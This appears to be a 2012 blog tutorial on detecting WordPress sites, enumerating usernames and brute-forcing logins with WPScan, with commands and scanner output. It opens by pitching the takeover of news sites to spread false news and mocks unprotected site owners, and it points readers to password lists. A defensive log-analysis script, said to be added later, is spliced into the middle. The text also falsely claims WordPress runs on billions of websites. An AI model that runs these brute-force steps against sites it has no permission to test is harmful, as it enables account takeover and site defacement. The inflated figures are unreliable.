WordPress is a content management system used by billions of websites across the internet. It’s used to create news websites, blogs, social networks, company websites and just about everything else out there. It’s become so popular that as of August 2011, 22% of the top 1 million visited websites on the internet are built on WordPress. This makes it a prime target for destruction on a global scale.
Imagine having access to several news websites on the web. Access to see news before it’s shared with the world and, best of all, access to change the news as you please. It’s a massive power. Within minutes you could literally start a global war by posting false news on multiple websites and have that content delivered to billions of people instantly.
Through my investigations I have found several extremely popular news websites that are using WordPress as their foundation. I have also found that several of these sites contain potential vulnerabilities, including bad passwords and exploits that can help somebody gain access to the entire server and lock out system administrators. For obvious reasons I’m not going to tell you what these sites are and what vulnerabilities they contain. I’m not paid to secure sites for companies and corporations, so it’s up to them to find the right man for the job.
Anyway moving on…
In this tutorial I’m going to show you how you can detect, scan and brute force attack WordPress sites to gain access to the CMS and potentially more. With a successful hack you can access and create post data, login credentials, subscriptions and just about anything else you can think of.
- Backtrack 5 R1
- Internet Connection
- Victim WordPress Site
- Password List
You can grab password lists through a Google search. Alternatively you can head over to the Insanity Pop Download Center and grab a few different lists to aid the brute force attack.
Identifying WordPress Sites:
For obvious reasons we need to have a target identified. There is no point picking sites at random because for the most part there is a good chance they won’t be built on the WordPress CMS. To identify WordPress sites we can use WPScan in Backtrack, but sometimes this tool doesn’t pick up identifiers, so it’s good practice to investigate the source code of the site we want to attack.
In the example below I’m showing you the Insanity Pop source code. You can view the source of any page from within your browser under the “View” or “Developer” menus. Alternatively there are online source viewers where you punch in the URL and it shows you the source code of that specific page. The wp-content and wp-includes paths are the giveaway:
href="http://insanitypop.com/wp-content/themes/skeptical/style.css
href="http://insanitypop.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
href="http://insanitypop.com/wp-content/plugins/social-toolbar/css/social_toolbar.css
Now that we have our site identified it’s time to run a scan to see whether we can find any usernames on the site. This seems to be a hit and miss process with some sites, but it’s important that we run this scan anyway. If it does turn up any results then there is a good chance it will find an administrator username. To run a scan load up your Backtrack operating system. In this example I’m using Backtrack 5 R1.
Open up a new terminal and type the following to access the wpscan folder:
If we type “ls” we can see a list of files and folders within this folder. You should be able to see a file called wpscan.rb. This is our scanning application which will attack the website. With our directory correct in the terminal we can now type the following to load up the scanner and see its options (if you’re curious, the tool is written in Ruby, hence the .rb file extension).
You will now see the following printed on the terminal:
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.

-h for further help.

Examples:

Do 'non-intrusive' checks...
ruby ./wpscan.rb --url www.example.com

Do wordlist password brute force on enumerated users using 50 threads...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the 'admin' username only...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

Generate a new 'most popular' plugin list, up to 150 pages...
ruby ./wpscan.rb --generate_plugin_list 150

Enumerate instaled plugins...
ruby ./wpscan.rb --enumerate p

See README for further information.
WPScan.rb gives us the following options that we can use within the application. In this tutorial we will be using “--url, --wordlist & --username”:
- --url The WordPress URL/domain to scan.
- --version Only do version enumeration.
- --wordlist Supply a wordlist for the password bruter and do the brute.
- --threads The number of threads to use when multi-threading requests.
- --username Only brute force the supplied username.
- --generate_plugin_list Generate a new data/plugins.txt file.
- -v Verbose output
Now let’s perform a scan. We type the following to tell wpscan.rb to scan a URL, replacing the URL with your desired victim:
./wpscan.rb --url http://www.insanitypop.com
WPScan will now scan the domain searching for the WordPress version and any potential exploits that are listed to attack that version of WordPress. In my case it showed the following:
# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.

| URL: http://www.insanitypop.com/
| Started on Tue Feb 7 00:56:21 2012

[+] The WordPress http://www.insanitypop.com/readme.html file exists.
[+] Finished at Tue Feb 7 00:56:23 2012
With that finished we can now scan for usernames. We use the --enumerate option with the argument “u”, which tells WPScan to enumerate usernames:
./wpscan.rb --url http://www.insanitypop.com --enumerate u
And the result: it found my username, as I am the administrator of the site. Please note that sometimes WPScan.rb can’t find usernames. If this is the case you will need to use social engineering or a username list file to try and brute force the login. I will show an example of the code to use for this under the heading “additional codes” at the end of this article.
# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.

| URL: http://www.insanitypop.com/
| Started on Tue Feb 7 00:59:33 2012

[+] The WordPress http://www.insanitypop.com/readme.html file exists.
[+] Enumerating usernames...
We found the following 1 username/s:
rcanpolat
[+] Finished at Tue Feb 7 00:59:46 2012
Now that we have a username it’s time to initiate a brute force attack and force our way into the login. WordPress can be protected with special plugins that don’t allow brute force attacks; however, there are billions of sites which are unaware of this, including several major corporation and news websites (idiots).
To perform a brute force attack we will need a password list to read passwords from and attempt them on the site. You can download a passwords list from the Insanity Pop Download Center under “Codes & Scripts” by clicking this url (Registration Required): http://insanitypop.com/downloads/
After you download your password list throw it into the wpscan folder. You can navigate to this folder by going to places/computer/file system/pentest/web/wpscan through the Backtrack GUI. In this tutorial my password list is called “passwords.lst”.
Type the following to request WPScan.rb to attempt a brute force attack on the username rcanpolat using the passwords.lst password list file. This is a long process however in many cases it can result in a successful crack:
./wpscan.rb --url http://www.insanitypop.com --wordlist passwords.lst --username rcanpolat
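The brute force above leaves an obvious trail on the server side, which is what an administrator should be watching for. Here is an added defender-side example (my own script, not part of the original tutorial or of WPScan): it reads web server access-log lines in the common combined format, flags any source IP that POSTs to wp-login.php at least five times inside a minute, and notes whether a 302 (the redirect WordPress sends on a successful login) followed the burst. The log lines, IP addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def detect_login_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag IPs that POST to wp-login.php at least `threshold` times inside any
    `window`. A failed WordPress login re-renders the form with HTTP 200; a
    successful one answers 302, so a 302 in the burst means it may have worked."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0].endswith("/wp-login.php"):
            posts[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in posts.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):          # sliding window over sorted attempts
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {"attempts": len(recs),
                              "success": any(r["status"] == 302 for r in recs)}
                break
    return alerts

# Constructed sample log (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.9 - - [07/Feb/2012:00:58:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Feb/2012:00:59:10 +0000] "GET /wp-login.php HTTP/1.1" 200 3452 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.5 - - [07/Feb/2012:00:59:{40 + i:02d} +0000] "POST /wp-login.php HTTP/1.1" {200 if i < 5 else 302} 3452 "-" "Ruby"'
    for i in range(6)
]
```

Running `detect_login_bruteforce(SAMPLE_LOG)` reports only 203.0.113.5, with six attempts and a success flag, which is the point at which the account password should be reset and the source blocked.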
We can use the command below to scan for plugins that contain vulnerabilities on the site:
./wpscan.rb --url http://www.insanitypop.com --enumerate p
We can use the following command to brute force a login using a username list file. This is a good place to start if WPScan.rb can’t find any usernames on the site:
./wpscan.rb --url www.example.com --wordlist passwords.lst --username usernames.lst
We can use multiple threads on a brute force attack using the following command:
./wpscan.rb --url www.example.com --wordlist passwords.lst --threads 50